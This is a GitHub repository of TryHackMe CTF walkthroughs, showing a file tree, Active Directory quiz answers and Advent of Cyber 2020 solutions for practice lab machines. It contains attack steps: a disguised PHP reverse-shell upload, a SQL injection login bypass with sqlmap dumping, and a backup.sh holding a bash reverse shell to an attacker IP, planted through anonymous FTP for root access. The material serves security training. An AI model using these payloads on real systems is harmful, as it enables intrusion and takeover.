├── .github
├── FUNDING.yml
├── ISSUE_TEMPLATE
│ └── bug_report.md
└── auto_assign.yml
├── Active-Directory-Basics
└── README.md
├── Advent-of-Cyber-2020
├── Day-01-A_Christmas_Crisis
│ └── README.md
├── Day-02-The_Elf_Strikes_Back!
│ ├── README.md
│ └── reverse.jpeg.php
├── Day-03-Christmas_Chaos
│ ├── README.md
│ └── login.png
├── Day-04-Santa's_watching
│ ├── README.md
│ ├── create_list.py
│ └── site.png
├── Day-05-Someone_stole_Santa's_gift_list!
│ ├── README.md
│ └── santapanel.png
├── Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night
│ ├── README.md
│ └── santasportal.png
├── Day-07-The_Grinch_Really_Did_Steal_Christmas
│ ├── %2f
│ ├── AoC-2020.png
│ ├── Operation Artic Storm.pdf
│ ├── README.md
│ ├── christmas-tree.jpg
│ ├── elf_mcskidy_wishlist.txt
│ ├── pcap1.pcap
│ ├── pcap2.pcap
│ ├── pcap3.pcap
│ ├── selfie.jpg
│ └── tryhackme_logo_full.svg
├── Day-08-What's_Under_the_Christmas_Tree?
│ └── README.md
├── Day-09-Anyone_can_be_Santa!
│ ├── README.md
│ ├── backup.sh
│ ├── old_backup.sh
│ └── shoppinglist.txt
├── Day-10-Dont-be-sElfish
│ ├── README.md
│ └── note_from_mcskidy.txt
├── Day-11-The_Rogue_Gnome
│ ├── LinEnum.sh
│ └── README.md
├── Day-12-Ready,_set,_elf.
│ └── README.md
├── Day-13-Coal_for_Christmas
│ ├── README.md
│ └── dirty.c
├── Day-14-Where's Rudolph?
│ ├── README.md
│ ├── twitter.jpeg
│ └── twitterHR.jpeg
├── Day-15-There's a Python in my stocking!
│ └── README.md
├── Day-16-Help! Where is Santa?
│ ├── README.md
│ └── api_fuzzer.py
├── Day-17-ReverseELFneering
│ ├── README.md
│ └── r2_cs.pdf
├── Day-18-The_Bits_of_Christmas
│ └── README.md
├── Day-19-The_Naughty_or_Nice_List
│ ├── README.md
│ └── list.png
├── Day-20-PowershELlF_to_the_rescue
│ └── README.md
├── Day-21-Time_for_some_ELForensics
│ └── README.md
├── Day-22-Elf_McEager_becomes_CyberElf
│ └── README.md
├── Day-23-The_Grinch_strikes_again!
│ ├── README.md
│ └── win-ransomware.png
├── Day-24-The_Trial_Before_Christmas
│ └── README.md
├── README.md
├── advent.png
└── thm-certificate.png
├── Advent-of-Cyber-2021
├── Day-01-Save_The_Gifts
│ └── README.md
├── Day-02-Elf_HR_Problems
│ └── README.md
├── Day-03-Christmas_Blackout
│ └── README.md
├── Day-04-Santas_Running_Behind
│ └── README.md
├── Day-05-Pesky_Elf_Forum
│ └── README.md
├── Day-06-Patch_Management_Is_Hard
│ └── README.md
├── Day-07-Migration_Without_Security
│ └── README.md
├── Day-08-Santas_Bag_of_Toys
│ └── README.md
├── Day-09-Where_Is_All_This_Data_Going
│ ├── AoC3.pcap
│ └── README.md
├── Day-10-Offensive_Is_The_Best_Defence
│ └── README.md
├── Day-11-Where_Are_The_Reindeers
│ └── README.md
├── Day-12-Sharing_Without_Caring
│ └── README.md
├── Day-13-They_Lost_The_Plan
│ └── README.md
├── Day-14-Dev(Insecure)Ops
│ └── README.md
├── Day-15-The_Grinchs_day_off
│ └── README.md
├── Day-16-Ransomware_Madness
│ └── README.md
├── Day-17-Elf_Leaks
│ └── README.md
├── Day-18-Playing_With_Containers
│ └── README.md
├── Day-19-Something_Phishy_Is_Going_On
│ └── README.md
├── Day-20-What_s_the_Worst_That_Could_Happen
│ └── README.md
├── Day-21-Needles_In_Computer_Stacks
│ └── README.md
├── Day-22-How_It_Happened
│ └── README.md
├── Day-23-PowershELlF_Magic
│ └── README.md
├── Day-24-Learning_From_The_Grinch
│ └── README.md
├── README.md
├── aoc.png
└── aoc2021.png
├── Agent-Sudo
├── Alien_autospy.jpg
├── README.md
├── To_agentJ.txt
├── _cutie.png.extracted
│ ├── 365
│ ├── 365.zlib
│ ├── 8702.zip
│ ├── To_agentR.txt
│ └── zip.hash
├── cute-alien.jpg
├── cutie.png
└── message.txt
├── Anonymous
└── README.md
├── Attacking-Kerberos
└── README.md
├── Attacktive-Directory
└── README.md
├── Authenticate
└── README.md
├── Avengers-Blog
└── README.md
├── Baron-Samedit
└── README.md
├── Bash-Scripting
└── README.md
├── Bebop
└── README.md
├── Bolt
└── README.md
├── Bounty-Hacker
├── README.md
├── locks.txt
└── task.txt
├── Brooklyn-Nine-Nine
└── README.md
├── Brute-It
└── README.md
├── Burp-Suite
└── README.md
├── CC:-Radare2
└── README.md
├── CTF-collection-Vol.1
└── README.md
├── Chill-Hack
└── README.md
├── Common-Linux-Privesc
└── README.md
├── Cross-site-Scripting
└── README.md
├── Cyborg
└── README.md
├── Easy-Peasy
├── README.md
├── binarycodepixabay.jpg
├── easypeasy.txt
├── hash.txt
└── secrettext.txt
├── Encryption-Crypto-101
└── README.md
├── Erit-Securus-I
└── README.md
├── Game-Zone
└── README.md
├── GamingServer
└── README.md
├── Geolocating-Images
├── README.md
└── thm
│ ├── 1.jpeg
│ ├── 2.png
│ ├── 3.png
│ └── 4.png
├── Getting-Started
└── README.md
├── GoldenEye
├── README.md
└── goldeneye.jpg
├── Gotta-Catch'em-All
└── README.md
├── Hacking-with-Powershell
└── README.md
├── Hardening-Basics-Part-1
└── README.md
├── Hardening-Basics-Part-2
└── README.md
├── Hashing-Crypto_101
└── README.md
├── HeartBleed
└── README.md
├── IMAGES
└── THMlogo.png
├── Intro-PoC-Scripting
└── README.md
├── Intro-to-Python
├── README.md
└── decode.py
├── Intro-to-Windows
└── README.md
├── Introduction-to-Django
└── README.md
├── Introduction-to-Flask
└── README.md
├── Introduction-to-OWASP-ZAP
└── README.md
├── Introductory-Networking
└── README.md
├── JavaScript-Basics
├── README.md
└── sort.js
├── John-The-Ripper
└── README.md
├── Jurassic-Park
└── README.md
├── LFI-Basics
└── README.md
├── LFI
└── README.md
├── LICENSE
├── LazyAdmin
├── README.md
├── hash.txt
├── mysql_bakup_20191129023059-1.5.1.sql
└── rshell.php
├── Linux-Challenges
└── README.md
├── Linux-Fundamentals
├── Linux-Fundamentals-Part-1
│ └── README.md
├── Linux-Fundamentals-Part-2
│ └── README.md
└── Linux-Fundamentals-Part-3
│ └── README.md
├── Linux-Strength-Training
└── README.md
├── Linux:-Local-Enumeration
└── README.md
├── MAL:-REMnux-The_Redux
└── README.md
├── NIS-Linux_Part_I
└── README.md
├── Nessus
└── README.md
├── Network-Services-2
└── README.md
├── Network-Services
└── README.md
├── Networking
└── README.md
├── Ninja-Skills
└── README.md
├── Nmap
└── README.md
├── OWASP-Juice-Shop
├── README.md
└── ftp
│ ├── acquisitions.md
│ ├── announcement_encrypted.md
│ ├── coupons_2013.md.bak%00..md
│ ├── eastere.gg%00.md
│ ├── encrypt.pyc%00.md
│ ├── incident-support.kdbx
│ ├── legal.md
│ ├── package.json.bak%00.md
│ ├── quarantine
│ ├── juicy_malware_linux_amd_64.url
│ ├── juicy_malware_linux_arm_64.url
│ ├── juicy_malware_macos_64.url
│ └── juicy_malware_windows_64.exe.url
│ └── suspicious_errors.yml%00.md
├── OWASP-Top-10
├── 47887.py
├── 48973.txt
├── README.md
├── login-logs.txt
├── owasp.png
├── rce.py
└── webapp.db
├── Overpass
├── README.md
└── downloads
│ └── src
│ └── buildscript.sh
├── Overpass2-Hacked
├── README.md
├── fasttrack.txt
├── img.png
└── overpass2.pcapng
├── Persistence
└── README.md
├── Pickle-Rick
├── README.md
├── reverse-shell.sh
└── rickandmorty.jpeg
├── Post-Exploitation-Basics
└── README.md
├── README.md
├── Regular-expressions
└── README.md
├── Res
└── README.md
├── RootMe
├── README.md
└── reverse-shell.php5
├── SSRF
└── README.md
├── Searchlight-IMINT
└── README.md
├── Skynet
└── README.md
├── Starting-Out-In-Cyber-Sec
└── README.md
├── Startup
├── README.md
├── important.jpg
├── notice.txt
└── suspicious.pcapng
├── Steel-Mountain
└── README.md
├── Sublist3r
├── README.md
└── sub-output-nbc.txt
├── The-Cod-Caper
└── README.md
├── The-find-command
└── README.md
├── Toolbox-Vim
└── README.md
├── ToolsRus
└── README.md
├── Tor
└── README.md
├── Upload-Vulnerabilities
└── README.md
├── Web-Scanning
└── README.md
├── Wgel-CTF
└── README.md
├── What-the-Shell?
└── README.md
├── Windows-PrivEsc
└── README.md
├── Wireshark-101
└── README.md
├── XXE
└── README.md
├── Year-of-the-Rabbit
└── README.md
├── ZTH:-Obscure-Web-Vulns
└── README.md
├── ZTH:-Web_2
└── README.md
├── Zero-Logon
└── README.md
├── cc-pentesting
└── README.md
├── crack-the-hash
├── hash1_4.txt
├── hash2_1.txt
├── hash2_2.txt
└── hash2_3.txt
├── iOS-Forensics
└── README.md
├── ignite
├── 47138.py
├── fuel-cms-exploit.py
└── revshell.php
├── kenobi
├── id_rsa
└── log.txt
├── lianyu
├── Leave_me_alone.png
├── Queen's_Gambit.png
├── aa.jpg
├── exiftool_Queens_Gambit-output.txt
├── exiftool_aa-output.txt
├── exiftool_leave-me-alone-output.txt
├── exploit
├── exploit.c
├── exploit.c.save
├── gobuster-output.txt
├── gobuster-output2.txt
├── gobuster-output3.txt
├── nmap-output.txt
├── ss.zip
└── ss
│ ├── passwd.txt
│ └── shado
└── tomghost
└── README.md
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | github: edoardottt
2 | liberapay: edoardottt
3 | patreon: edoardottt
4 | ko_fi: edoardottt
5 | open_collective: edoardottt
6 | custom: "https://www.paypal.me/edoardottt"
7 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: Create a report to help us improve
4 | title: ''
5 | labels: ''
6 | assignees: ''
7 |
8 | ---
9 |
10 |
11 |
--------------------------------------------------------------------------------
/.github/auto_assign.yml:
--------------------------------------------------------------------------------
1 | # Set to true to add reviewers to pull requests
2 | addReviewers: true
3 |
4 | # A list of reviewers to be added to pull requests (GitHub user name)
5 | reviewers:
6 | - edoardottt
7 |
8 | # A list of keywords: if a pull request includes one of them, the process that adds reviewers is skipped
9 | skipKeywords:
10 | - wip
11 |
12 | # A number of reviewers added to the pull request
13 | # Set 0 to add all the reviewers (default: 0)
14 | numberOfReviewers: 0
15 |
--------------------------------------------------------------------------------
/Active-Directory-Basics/README.md:
--------------------------------------------------------------------------------
1 | # Active Directory Basics
2 |
3 | - I understand what Active Directory is and why it is used.
4 |
5 | no answer needed
6 |
7 | - What database does the AD DS contain?
8 |
9 | - `NTDS.dit`
10 |
11 | - Where is the NTDS.dit stored?
12 |
13 | - `%SystemRoot%\NTDS`
14 |
15 | - What type of machine can be a domain controller?
16 |
17 | - `Windows server`
18 |
19 | - What is the term for a hierarchy of domains in a network?
20 |
21 | - `tree`
22 |
23 | - What is the term for the rules for object creation?
24 |
25 | - `Domain schema`
26 |
27 | - What is the term for containers for groups, computers, users, printers, and other OUs?
28 |
29 | - `Organization units`
30 |
31 | - Which type of groups specify user permissions?
32 |
33 | - `Security groups`
34 |
35 | - Which group contains all workstations and servers joined to the domain?
36 |
37 | - `Domain computers`
38 |
39 | - Which group can publish certificates to the directory?
40 |
41 | - `Cert publisher`
42 |
43 | - Which user can make changes to a local machine but not to a domain controller?
44 |
45 | - `Local administrators`
46 |
47 | - Which group has their passwords replicated to read-only domain controllers?
48 |
49 | - `Allowed RODC Password Replication Group`
50 |
51 | - What type of trust flows from a trusting domain to a trusted domain?
52 |
53 | - `Directional`
54 |
55 | - What type of trusts expands to include other trusted domains?
56 |
57 | - `Transitive`
58 |
59 | - What type of authentication uses tickets?
60 |
61 | - `Kerberos`
62 |
63 | - What domain service can create, validate, and revoke public key certificates?
64 |
65 | - `Certificate Services`
66 |
67 | - What is the Azure AD equivalent of LDAP?
68 |
69 | - `Rest apis`
70 |
71 | - What is the Azure AD equivalent of Domains and Forests?
72 |
73 | - `Tenants`
74 |
75 | - What is the Windows Server AD equivalent of Guests?
76 |
77 | - `Trusts`
78 |
79 | - Deploy the machine
80 |
81 | no answer needed
82 |
83 | - What is the name of the Windows 10 operating system?
84 |
85 | - `Get-NetComputer -fulldata | select operatingsystem`
86 | - `*********** ** ********* **********`
87 |
88 | - What is the second "Admin" name?
89 |
90 | - `Get-NetUser | select cn`
91 | - `******`
92 |
93 | - Which group has a capital “V” in the group name?
94 |
95 | - `net localgroup`
96 | - `Hyper-V Administrators`
97 |
98 | - When was the password last set for the SQLService user?
99 |
100 | - `Get-ADUser -identity SQLService -properties *`
101 | - `5/**/2020 *:**:** PM`
102 |
103 | - I understand the basics of Active Directory
104 |
105 | no answer needed
106 |
107 |
108 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-01-A_Christmas_Crisis/README.md:
--------------------------------------------------------------------------------
1 | # Day 1 - A Christmas Crisis
2 |
3 | - **Deploy your AttackBox (the blue "Start AttackBox" button)** and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP into the browser search bar.
4 |
5 | no answer needed
6 |
7 | - Register for an account, and then login.
8 | What is the name of the cookie used for authentication?
9 |
10 | - Open a browser (I suggest Chrome or Firefox) and fire up the browser developer tools (F12). Go to the Storage tab and select Cookies on the left. `auth`.
11 |
12 | - In what format is the value of this cookie encoded?
13 |
14 | - `hexadecimal`
15 |
16 | - Having decoded the cookie, what format is the data stored in?
17 |
18 | - `json`
19 |
20 | - Figure out how to bypass the authentication.
21 | What is the value of Santa's cookie?
22 |
23 | - Decode your cookie value from hexadecimal to text. I used [this](https://cryptii.com/pipes/hex-decoder). Then change the username to `santa` and re-encode the result as hexadecimal. You should have something like: `************************************************************************************************d65223a2253616e7461227d`
24 | - Now, if you replace the previous cookie value with this new one and refresh the page, you will see some changes...
25 |
26 | - Now that you are the santa user, you can re-activate the assembly line!
27 | What is the flag you're given when the line is fully active?
28 |
29 | - `THM{********************************}`
30 |
31 | ## see you...
32 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/README.md:
--------------------------------------------------------------------------------
1 | # Day 2 - The Elf Strikes Back!
2 |
3 | - What string of text needs added to the URL to get access to the upload page?
4 |
5 | - `?id=YOUR-ID-HERE`
6 |
7 | - What type of file is accepted by the site?
8 |
9 | - Open the browser and check the page source code. You will find this string: ``
10 | - `image`
11 |
12 | - Bypass the filter and upload a reverse shell.
13 | In which directory are the uploaded files stored?
14 |
15 | - Change the IP in the file reverse.jpeg.php to your own IP (the VPN address, i.e. tun0) and upload that file.
16 |
17 | - `/uploads/`
18 |
19 | - Activate your reverse shell and catch it in a netcat listener!
20 |
21 | - `nc -lvnp 1234`
22 |
23 | - Go to `http:///uploads/` and click on reverse.jpeg.php
24 |
25 | - You should see a shell.
26 |
27 | - What is the flag in /var/www/flag.txt?
28 |
29 | - `cat /var/www/flag.txt`
30 |
31 | - `THM{**********************************}`
32 |
33 | ## see you ...
34 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-03-Christmas_Chaos/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-03-Christmas_Chaos/login.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-04-Santa's_watching/README.md:
--------------------------------------------------------------------------------
1 | # Day 4 - Santa's watching
2 |
3 | Our malicious, despicable, vile, cruel, contemptuous, evil hacker has defaced Elf's forums and completely removed the login page! However, we may still have access to the API. The sysadmin also told us that the API creates logs using dates with a format of **YYYYMMDD**.
4 |
5 | Recommended list: [big.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/big.txt)
6 |
7 | - Deploy your AttackBox (the blue "Start AttackBox" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP (10.10.135.56) into the browser search bar.
8 |
9 | no answer needed
10 |
11 | If you navigate with your browser to the machine's IP you should see this page:
12 |
13 |
14 | 
15 |
16 | - Given the URL "http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the "breed" parameter using the wordlist "big.txt" (assume that "big.txt" is in your current directory)
17 | **Note: For legal reasons, do not actually run this command as the site in question has not consented to being fuzzed!**
18 |
19 | - `wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ`
20 |
21 | - Use GoBuster (against the target you deployed -- not the shibes.xyz domain) to find the API directory. What file is there?
22 |
23 | - `gobuster dir -u -w big.txt`
24 | - You will find a directory and a PHP file.
25 |
26 | - Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?
27 |
28 | - Run the Python script with `python3 create_list.py`. It creates a wordlist of candidate dates in `YYYYMMDD` format.
29 | - `wfuzz -c -z file,YYYYMMDD-list.txt -d "date=FUZZ" --hw 0 http:///api/site-log.php`
30 | - This command fuzzes the date parameter; I set `--hw 0` because after a few tries I noticed that the incorrect responses contain no words, so hiding zero-word responses filters them out.
31 | - The only response left is for a single date; take that date, let's say it is YYYYMMDD. Go to the browser and query `http:///api/site-log.php?date=YYYYMMDD`.
32 | - `THM{********}`
33 |
34 | # see you ...
35 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-04-Santa's_watching/create_list.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | '''
3 | @author edoardottt
4 | '''
# Inclusive year range covered by the generated YYYYMMDD wordlist.
starting_year, current_year = 2010, 2020
7 |
def pad_number(inp, length):
    """Return ``inp`` as a string left-padded with ``"0"`` to ``length`` characters.

    A value whose string form is already ``length`` characters or longer is
    returned unchanged; nothing is ever truncated.
    """
    # rjust pads on the left with the fill character and never shortens.
    return str(inp).rjust(length, "0")
11 |
# Write one candidate date per line, YYYYMMDD, for every year in
# [starting_year, current_year], every month 1-12 and every day 1-31.
# Day 29-31 is emitted for every month, so the list also contains
# calendar-invalid dates; callers that fuzz with it simply get no hit for those.
with open("YYYYMMDD-list.txt", "w+") as out_file:
    candidates = (
        pad_number(year, 4) + pad_number(month, 2) + pad_number(day, 2) + "\n"
        for year in range(starting_year, current_year + 1)
        for month in range(1, 13)
        for day in range(1, 32)
    )
    out_file.writelines(candidates)
17 |
18 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-04-Santa's_watching/site.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-04-Santa's_watching/site.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/README.md:
--------------------------------------------------------------------------------
1 | # Day 5 - Someone stole Santa's gift list!
2 |
3 | - Without using directory brute forcing, what's Santa's secret login panel?
4 |
5 | - You don't need a directory fuzzer, because no wordlist will contain this word.
6 | - `santapanel`
7 |
8 | You will see this page:
9 | 
10 |
11 | - Visit Santa's secret login panel and bypass the login using SQLi
12 |
13 | no answer needed
14 |
15 | - Just enter `' OR true --` in the username field
16 |
17 | - How many entries are there in the gift database?
18 |
19 | - `(' OR true --`
20 | - `22`
21 |
22 | - What did Paul ask for?
23 |
24 | - `github ownership`
25 |
26 | - What is the flag?
27 |
28 | - You have to enable the Burp option with FoxyProxy.
29 | - Then open Burp Suite and perform a single request from the text field.
30 | - You will see Burp Suite open with an HTTP request. Send it to Repeater and save the item as shown in the explanatory section before the CTF.
31 | - Then start sqlmap with `sqlmap -r request.txt --tamper=space2comment --dump-all --dbms sqlite`, where request.txt is the request you saved from Burp Suite.
32 | - (If sqlmap prompts you, opt for the broadest set of tests it offers, answering y or n to its questions accordingly.)
33 | - `thmfox{***_*_****_***_*********_**_***}`
34 |
35 | - What is the admin password?
36 |
37 | - `****************`
38 |
39 | # see you ...
40 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/santapanel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/santapanel.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/README.md:
--------------------------------------------------------------------------------
1 | # Day 6 - Be careful with what you wish on a Christmas night
2 |
3 | - Deploy your AttackBox (the blue "Start AttackBox" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open Firefox on the AttackBox and copy/paste the machines IP (http://:5000) into the browser search bar (the webserver is running on port 5000, so make sure this is included in your web requests).
4 |
5 | no answer needed
6 |
7 | 
8 |
9 | - What vulnerability type was used to exploit the application?
10 |
11 | - `stored crosssite scripting`
12 |
13 | - What query string can be abused to craft a reflected XSS?
14 |
15 | - If you search for something in the first search bar, you will see a new query parameter appended to the URL.
16 | - `q`
17 |
18 | - Launch the OWASP ZAP Application
19 |
20 | no answer needed
21 |
22 | - Run a ZAP (zaproxy) automated scan on the target. How many alerts does it display?
23 |
24 | - `5`
25 |
26 | - How many types of XSS are there in the scan?
27 |
28 | - `2`
29 |
30 | - Explore the XSS alerts that ZAP has identified, are you able to make an alert appear on the "Make a wish" website?
31 |
32 | no answer needed
33 |
34 | ## see you ...
35 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/santasportal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/santasportal.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/AoC-2020.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/AoC-2020.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/Operation Artic Storm.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/Operation Artic Storm.pdf
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/README.md:
--------------------------------------------------------------------------------
1 | # The Grinch Really Did Steal Christmas
2 |
3 | Download the ZIP file "aocpcaps.zip" that is attached to this task, use a combination of the filters and features of Wireshark we've covered to answer the questions below:
4 |
5 | - Open "pcap1.pcap" in Wireshark. What is the IP address that initiates an ICMP/ping?
6 |
7 | - `10.11.3.2`
8 |
9 | - If we only wanted to see HTTP GET requests in our "pcap1.pcap" file, what filter would we use?
10 |
11 | - `http.request.method == get`
12 |
13 | - Now apply this filter to "pcap1.pcap" in Wireshark, what is the name of the article that the IP address "10.10.67.199" visited?
14 |
15 | - `reindeer-of-the-week`
16 |
17 | - Let's begin analysing "pcap2.pcap". Look at the captured FTP traffic; what password was leaked during the login process?
18 | There's a lot of irrelevant data here - Using a filter here would be useful!
19 |
20 | - `*********_********_******`
21 |
22 | - Continuing with our analysis of "pcap2.pcap", what is the name of the protocol that is encrypted?
23 |
24 | - `ssh`
25 |
26 | - Analyse "pcap3.pcap" and recover Christmas!
27 | What is on Elf McSkidy's wishlist that will be used to replace Elf McEager?
28 |
29 | - `Rubber ducky`
30 |
31 | ## see you ...
32 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/christmas-tree.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/christmas-tree.jpg
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/elf_mcskidy_wishlist.txt:
--------------------------------------------------------------------------------
1 | Wish list for Elf McSkidy
2 | -------------------------
3 | Budget: £100
4 |
5 | x3 Hak 5 Pineapples
6 | x1 Rubber ducky (to replace Elf McEager)
7 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap1.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap1.pcap
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap2.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap2.pcap
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap3.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap3.pcap
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/selfie.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/selfie.jpg
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-08-What's_Under_the_Christmas_Tree?/README.md:
--------------------------------------------------------------------------------
1 | # What's under the Christmas Tree?
2 |
3 |
4 | - When was Snort created?
5 |
6 | - A Google search is enough (as always...).
7 | - `1998`
8 |
9 | - Using Nmap on , what are the port numbers of the three services running? (Please provide your answer in ascending order/lowest -> highest, separated by a comma)
10 |
11 | - `nmap `
12 | - `80,2222,3389`
13 |
14 | - Run a scan and provide the -Pn flag to ignore ICMP being used to determine if the host is up
15 |
16 | no answer needed
17 |
18 | - `nmap -Pn `
19 |
20 | - Experiment with different scan settings such as -A and -sV whilst comparing the outputs given.
21 |
22 | no answer needed
23 |
24 | - `nmap -A `
25 | - `nmap -sV `
26 |
27 | - Use Nmap to determine the name of the Linux distribution that is running, what is reported as the most likely distribution to be running?
28 |
29 | - `nmap -Pn -sV `
30 | - `Ubuntu`
31 |
32 | - Use Nmap's Network Scripting Engine (NSE) to retrieve the "HTTP-TITLE" of the webserver. Based on the value returned, what do we think this website might be used for?
33 |
34 | - `nmap --script=http-title `
35 | - `blog`
36 |
37 | - Now use different scripts against the remaining services to discover any further information about them
38 |
39 | no answer needed
40 |
41 | - `nmap --script=vuln `
42 | - `nmap --script=ssh-auth-methods -p 2222 `
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/README.md:
--------------------------------------------------------------------------------
1 | # Anyone can be Santa!
2 |
3 | Before we begin, we're going to need to deploy two Instances:
4 |
5 | 1. The THM AttackBox by pressing the "Start AttackBox" button at the top-right of the page.
6 | 2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
7 |
8 | - Name the directory on the FTP server that has data accessible by the "anonymous" user
9 |
10 | - `ftp ` and enter `anonymous`
11 | - `public`
12 |
13 | - What script gets executed within this directory?
14 |
15 | - `backup.sh`
16 |
17 | - What movie did Santa have on his Christmas shopping list?
18 |
19 | - (ftp) `get shoppinglist.txt`
20 | - `The polar express`
21 |
22 | - Re-upload this script to contain malicious data (just like we did in section 9.6). Output the contents of /root/flag.txt!
23 | Note that the script that we have uploaded may take a minute to return a connection. If it doesn't after a couple of minutes, double-check that you have setup a Netcat listener on the device that you are working from, and have provided the TryHackMe IP of the device that you are connecting from.
24 |
25 | - Insert your IP address in `backup.sh` where the placeholder is.
26 | - (ftp) `put backup.sh`
27 | - On your machine `nc -lvnp 4444`
28 | - You should get a root shell in a minute.
29 | - `cat /root/flag.txt`
30 | - `THM{****_***_***_**_*****}`
31 |
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/backup.sh:
--------------------------------------------------------------------------------
# Payload referenced by the Day 9 README: an interactive bash whose stdin,
# stdout and stderr are redirected over a TCP connection to the listener
# address; 10.9.126.198 is the walkthrough author's VPN (tun0) address and
# 4444 matches the `nc -lvnp 4444` listener in the README.
bash -i >& /dev/tcp/10.9.126.198/4444 0>&1
2 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/old_backup.sh:
--------------------------------------------------------------------------------
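#!/bin/bash

# Created by ElfMcEager to backup all of Santa's goodies!

# Create backups to include date DD_MM_YYYY.
# A single `date` call keeps day, month and year consistent even if the
# script runs across midnight (three separate calls could disagree).
filename="backup_$(date +%d_%m_%Y).tar.gz"

# Backup FTP folder and store in elfmceager's home directory.
# Quoted so the destination is passed as one argument whatever it contains.
# NOTE(review): per the Day 9 README this script sits in the anonymous-writable
# FTP share and the replaced copy runs as root; a scheduled script must not be
# writable by the users whose data it backs up.
tar -zcvf "/home/elfmceager/${filename}" /opt/ftp

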